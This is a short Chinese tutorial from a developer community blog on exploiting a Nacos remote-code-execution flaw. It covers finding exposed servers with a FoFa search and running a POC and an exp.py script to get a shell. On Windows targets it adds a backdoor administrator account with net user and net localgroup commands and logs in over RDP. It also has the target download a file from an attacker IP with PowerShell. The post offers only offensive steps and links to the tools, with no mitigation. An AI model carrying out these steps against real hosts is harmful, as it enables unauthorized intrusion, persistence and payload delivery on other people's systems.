首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >nacos RCE漏洞利用

nacos RCE漏洞利用

原创
作者头像
九笙
发布2025-07-11 16:41:49
发布2025-07-11 16:41:49
1730
举报

Nacos RCE 漏洞检测与利用教程

Poc检测

  1. FoFa 搜索语法app="nacos"
  2. 准备工作
    • 开启 BP8080 监听
    • 上传 service.py 到攻击机 (38.12.31.36)
    • 在目标目录执行:python service.py
  3. 漏洞检测
    • 在压缩包目录打开 CMD
    • 执行检测命令:python nacosRCE漏洞POC.py
    • 粘贴目标 URL 路径
    • 自动检测结果

该 POC 可同时检测 Windows/Linux 系统

Windows 系统利用 (mstsc)

  1. 检测到 Windows 主机
  2. 执行 EXP
    • 运行:python exp.py
    • 输入目标 URL(格式:http://x.x.x.x
  3. 获取交互式 Shell
    • 添加用户:net user hello 123456 /add
    • 提权管理员:net localgroup administrators hello /add
  4. 远程桌面连接
    • Win+R 输入 mstsc
    • 输入目标 IP 和创建的凭据
    • 成功连接

文件下载操作

  1. 在攻击机创建 Web 服务
    • 创建测试文件:echo hello > hello.txt
    • 启动 HTTP 服务:python -m http.server
  2. 从目标机下载文件
    • 在 EXP 的 command 模式执行:powershell wget -o ./hello.txt http://38.12.31.36:8000/hello.txt
    • 验证下载成功

漏洞利用工具下载

工具下载链接

内容结束

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • Nacos RCE 漏洞检测与利用教程
    • Poc检测
    • Windows 系统利用 (mstsc)
    • 文件下载操作
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档